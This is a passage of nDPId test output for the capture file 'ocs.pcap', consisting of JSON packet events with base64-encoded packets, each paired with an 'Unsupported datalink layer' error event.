layer","datalink":12,"packet_id":233,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797130} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":233,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFvQABABoF6wKi0ArL40DbC2QBQ64tGkd7pX1+AEA8JZ40AAAEBCAoANYa1RwYGzA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":234,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797130} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":234,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFwQABABoF5wKi0ArL40DbC2QBQ64tGkd7pZMuAEA82YfQAAAEBCAoANYa1RwYGzA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":235,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797202} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":235,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFxQABABoF4wKi0ArL40DbC2QBQ64tGkd7pajeAEA9jXD0AAAEBCAoANYa8RwYG4w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":236,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797207} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":236,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFyQABABoF3wKi0ArL40DbC2QBQ64tGkd7pb6OAEA+QVqMAAAEBCAoANYa9RwYG4w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":237,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797208} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":237,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFzQABABoF2wKi0ArL40DbC2QBQ64tGkd7pdQ+AEA++UQkAAAEBCAoANYa9RwYG4w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":238,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797276} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":238,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMF0QABABoFpwKi0ArL40DbC2QBQ64tGkd7pdQ+wEA++YrQAAAEBCAoANYbERwYG4wEBBQre6Xp73ul\/5w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":239,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797278} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":239,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMF1QABABoFowKi0ArL40DbC2QBQ64tGkd7pdQ+wEA++XUgAAAEBCAoANYbERwYG4wEBBQre6Xp73umFUw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":240,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797354} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":240,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMF2QABABoFnwKi0ArL40DbC2QBQ64tGkd7pdQ+wEA++V9UAAAEBCAoANYbLRwYG4wEBBQre6Xp73umKvw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":241,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797357} -00330{"packet_event_id":1,"packet_event_name":"packet","packet_id":241,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPAMUQABABslXwKi0AkDpuLyAsgG7QZiF2AAAAACgAjkIz8gAAAIEBbQEAggKADWGzAAAAAABAwMG"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":242,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797427} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":242,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANAMVQABABslewKi0AkDpuLyAsgG7QZiF2aTu9RqAEADl+L8AAAEBCAoANYbSHkOFlA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":243,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797442} -00619{"packet_event_id":1,"packet_event_name":"packet","packet_id":243,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":271,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":271,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQABDwMWQABABsiCwKi0AkDpuLyAsgG7QZiF2aTu9RqAGADlVfIAAAEBCAoANYbUHkOFlBYDAQDWAQAA0gMD4HuK+eOlMdUOH1cZsMt60He+NukWbTB7f1JNaYrt+NsAACjAK8AswC\/AMACeAJ\/ACcAKwBPAFAAzADnAB8ARAJwAnQAvADUABQD\/AQAAgQAAABUAEwAAEG10YWxrLmdvb2dsZS5jb20ACwAEAwABAgAKADQAMgAOAA0AGQALAAwAGAAJAAoAFgAXAAgABgAHABQAFQAEAAUAEgATAAEAAgADAA8AEAARACMAAAANACAAHgYBBgIGAwUBBQIFAwQBBAIEAwMBAwIDAwIBAgICAw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":244,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797505} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":244,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANAMXQABABslcwKi0AkDpuLyAsgG7QZiGtKTu+oaAEAES8esAAAEBCAoANYbaHkOF7A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":245,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797508} -00325{"packet_event_id":1,"packet_event_name":"packet","packet_id":245,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANAMYQABABslbwKi0AkDpuLyAsgG7QZiGtKTu\/\/KAEAE\/7FEAAAEBCAoANYbbHkOF7A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":246,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797508} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":246,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANAMZQABABslawKi0AkDpuLyAsgG7QZiGtKTvBHiAEAFq56AAAAEBCAoANYbbHkOF7A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":247,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797556} -00493{"packet_event_id":1,"packet_event_name":"packet","packet_id":247,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":178,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":178,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAsgMaQABABsjbwKi0AkDpuLyAsgG7QZiGtKTvBHiAGAFqNYcAAAEBCAoANYbgHkOF7BYDAwBGEAAAQkEEygA0cs5oyBQUPZsJWy3f3szO8eg6l5VS2eGtEbXrhuValhaBoFT5VOyPsBGiM5YcAWBvsKH5wssaiUW5asI4uBQDAwABARYDAwAo\/EiJwPKZA3acP9qn2s6P7AQ++VRJWrM7uU+CT68BE23E8ejpTzHCVQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":248,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797588} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":248,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANAMbQABABslYwKi0AkDpuLyAsgG7QZiHMqTvBW6AEAGW5YgAAAEBCAoANYbjHkOGXA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":249,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797654} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":249,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMF3QABABoFywKi0ArL40DbC2QBQ64tGkd7pir+AEA\/rOocAAAEBCAoANYbpRwYHXA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":250,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797663} -01995{"packet_event_id":1,"packet_event_name":"packet","packet_id":250,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1287,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1287,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAFBwMcQABABsSEwKi0AkDpuLyAsgG7QZiHMqTvBW6AGAGWC7UAAAEBCAoANYbpHkOGXBcDAwTO\/EiJwPKZA3dbY0bV48S\/8B+KPvXL6uHh8kwl68mglGPqUWQnS4ihswpXATa8xJs\/ErW4nATOodFQc2kKQTe82p7q8M25Y78EiEAyNMu7a4TsqepNtN5bTMVOUb8eYTCoMwc0HhXDsONiQtsPkEmJLyVlNDdyGpzwllU2aHiA3ZE8crgaX5DhVoEkLfWDFzwJLEdgiPsYt4BU2VizvfXBVo1rO8rucKHXrbWqPJL0WvbPOotCeVKrcHrqwpgVFM0eOlACpjbfEa6SZ673IzbfFzdYjeNSZdVAoj4kdBndlcaacuv0ybNrK3LTQmB405aTCvX\/7nlJdSHnScG3EVcFpiF42wgNvlbyoePdcMUFB4H5tgoPqHTo+6tZhw+qYDxWxXvJ9Gbgds3nnFFYsus0KHTRs+a4AqMbveo9YFAll\/tf1zWUN4xHIneGiOU6dHp+5\/Fv1mVx3jlCaArl\/\/DTItJQ3jjakFkAkKSmNZ3tN2ANoEmbocMeWszErAiCOQmLLlvMqho1AKw8oLycKNWGTBztEJZz9DteorI87q\/yKn9jwUXFrXdy+UbYNK5QZLroVPukIPR1tk0UypCZavxid2MKMTKOc+5UOBfCrFMwwOKAzhrusBHWjfJouOmbOyfWvJkDzneqnHKPsfUE2IY0p6UQKZ5uGNpsJvkrNU1OdBE8rm3FwktsYIOC\/yYXhdyo6HPwvuEmqsMOnwg\/bWu9baKbXudCIT423Ss3ZaGwsl5s1mqY5t2JfMWUsQlgN1yC9bZOxAegToXNcE80Qfq7LBqrty7lLOI6kHxV24mgYLEJFr44TdzYSLqLfPND7iwN+WT34VEmpq0K\/DFYSVPp\/bXCExATfKgkwA72ga9r4lJ\/nkN8LmScz4gbNtFoR5LusN\/E\/GsX6FZpzdvzPuwu77xdagp+t3VZ7cc1JxbbdslPYWiqdiTbQHg+LsMKLJwqNcBHfRuOTeG8tH47ouivwyCEd5IqYzV3TIV9X1K8sxLJY9NZfFjHcbZfKZVVDyJPosWTzP98lU7KKRiu1yCbq1Ayavj2v\/0incz4PN+Py5U3yn9gdWSLh2G4kij2l0yKfji9W98jLy8ggZXtD2+bX5hMuFZ2eBGTr1DaTk7TI3vIktIqF3YWYr4MMG9GlusIV4id\/Liwj6N7Q2v5PfD3ucO1vaQ\/Bzb2L3uyuSveRcdCDgc32xr5L0y\/dATFRVhufkMatmgfNjxzODgOauV3Rh9PgpNL\/iCKDZWcalPKHi9DiOUL4QHAQDSSOcsUhbCuazYY1Tk+tA1KMSEKU4YmfjaulSnrk4WWu1\/bD7tYPeLcKfAJx\/LFpwvlfXxKhTfzbBF+en0Nb9ieek1uPIqnIfbLf1f10WdUZTWo5sq+s6a6enxuz+sYOR2IAeLXE7IG8r0iWygASktfkkI1B1LC40WXjp+FsTdp2T2prbawvOVeTSpEuf2cat\/Nl+ijW\/JuwZmdiS5vJVlEY68oxGFYGUcrT9iaDsNjTBEwU7MGwoyJvbitWc0nrtPVOKPCFa0QXY8nxtWVYMJLm071UWJDl71WQ6MpxLJvhZyqO4FQC9rGoAHMZtDxUhb5cMYFaUF5oP06UAg4ci8viATb0OkRGrkpJP5VyA9qkbIVVPhR"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":251,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797688} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":251,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMF4QABABoFlwKi0ArL40DbC2QBQ64tGkd7pir+wEA\/rINUAAAEBCAoANYbtRwYHXAEBBQre6ZAr3umVlw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":252,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797690} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":252,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMF5QABABoFkwKi0ArL40DbC2QBQ64tGkd7pir+wEA\/rG2kAAAEBCAoANYbtRwYHXAEBBQre6ZAr3umbAw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":253,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797725} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":253,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANAMdQABABslWwKi0AkDpuLyAsgG7QZiMBaTvBYyAEAGW4BQAAAEBCAoANYbxHkOG0Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":254,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797743} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":254,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMF6QABABoFvwKi0ArL40DbC2QBQ64tGkd7pmwOAEBAYKfsAAAEBCAoANYbyRwYHbg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":255,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797744} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":255,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMF7QABABoFiwKi0ArL40DbC2QBQ64tGkd7pmwOwEBAYBXUAAAEBCAoANYbyRwYHbgEBBQre6ZWX3umbAw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":256,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797744} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":256,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMF8QABABoFtwKi0ArL40DbC2QBQ64tGkd7poG+AEBBFJGIAAAEBCAoANYbyRwYHbg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":257,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797745} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":257,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANAMeQABABslVwKi0AkDpuLyAsgG7QZiMBaTvBf2AEAGW348AAAEBCAoANYbyHkOG5A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":258,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797750} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":258,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMF9QABABoFswKi0ArL40DbC2QBQ64tGkd7ppduAEBBzHscAAAEBCAoANYbzRwYHbg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":259,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797774} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":259,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANAMfQABABslUwKi0AkDpuLyAsgG7QZiMBaTvBnqAEAGW3wwAAAEBCAoANYb1HkOG5w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":260,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797807} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":260,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMF+QABABoFrwKi0ArL40DbC2QBQ64tGkd7pq0eAEBCgGR0AAAEBCAoANYb5RwYHeQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":261,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797808} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":261,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMF\/QABABoFqwKi0ArL40DbC2QBQ64tGkd7psLOAEBDNE4MAAAEBCAoANYb5RwYHeg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":262,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797809} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":262,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGAQABABoFpwKi0ArL40DbC2QBQ64tGkd7pth+AEBD6DekAAAEBCAoANYb5RwYHew=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":263,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797875} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":263,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGBQABABoFowKi0ArL40DbC2QBQ64tGkd7pu4uAEBEoCDsAAAEBCAoANYb\/RwYHiQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":264,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797888} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":264,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGCQABABoFnwKi0ArL40DbC2QBQ64tGkd7pwPeAEBFVAp8AAAEBCAoANYcBRwYHig=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":265,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797948} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":265,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGDQABABoFawKi0ArL40DbC2QBQ64tGkd7pwPewEBFVfHoAAAEBCAoANYcHRwYHigEBBQre6cZj3unLzw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":266,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797948} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":266,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGEQABABoFZwKi0ArL40DbC2QBQ64tGkd7pwPewEBFVdw4AAAEBCAoANYcHRwYHigEBBQre6cZj3unROw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":267,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798019} -00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":267,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMGFQABABoFQwKi0ArL40DbC2QBQ64tGkd7pwPfQEBFV248AAAEBCAoANYcORwYHigEBBRLe6dwT3unhf97pxmPe6dE7"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":268,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798085} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":268,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGGQABABoFXwKi0ArL40DbC2QBQ64tGkd7p0TuwEBGCQGcAAAEBCAoANYcVRwYHvgEBBQre6dwT3unhfw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":269,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798230} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":269,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":65,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":65,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQYcjQABAES7OwKi0AggICAguEQA1AC1oEnazAQAAAQAAAAAAAARwbGF5Cmdvb2dsZWFwaXMDY29tAAABAAE="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":270,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798305} -00330{"packet_event_id":1,"packet_event_name":"packet","packet_id":270,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPHAIQABABm7AwKi0AkDppl+6uwG7gNP3IgAAAACgAjkI9zgAAAIEBbQEAggKADWHKgAAAAABAwMG"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":271,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798386} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":271,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANHAJQABABm7HwKi0AkDppl+6uwG7gNP3IxI082eAEADlT7wAAAEBCAoANYczAMsH6w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":272,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798392} -00571{"packet_event_id":1,"packet_event_name":"packet","packet_id":272,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":236,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":236,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAA7HAKQABABm4OwKi0AkDppl+6uwG7gNP3IxI082eAGADln0MAAAEBCAoANYczAMsH6xYDAQCzAQAArwMBVmhd\/avXwE9Hbo+g4bJoaBoe\/PaQpNdc4O0Q8a7HcbYAAEYABAAFAC8ANcACwATABcAMwA7AD8AHwAnACsARwBPAFAAzADkAMgA4AArAA8ANwAjAEgAWABMACQAVABIAAwAIABQAEQD\/AQAAQAALAAQDAAECAAoANAAyAAEAAgADAAQABQAGAAcACAAJAAoACwAMAA0ADgAPABAAEQASABMAFAAVABYAFwAYABk="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":273,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798478} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":273,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQHALQABABm65wKi0AkDppl+6uwG7gNP32xI082ewEADl\/WcAAAEBCAoANYc8AMsH6wEBBQoSNPjTEjT+Pw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":274,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798479} 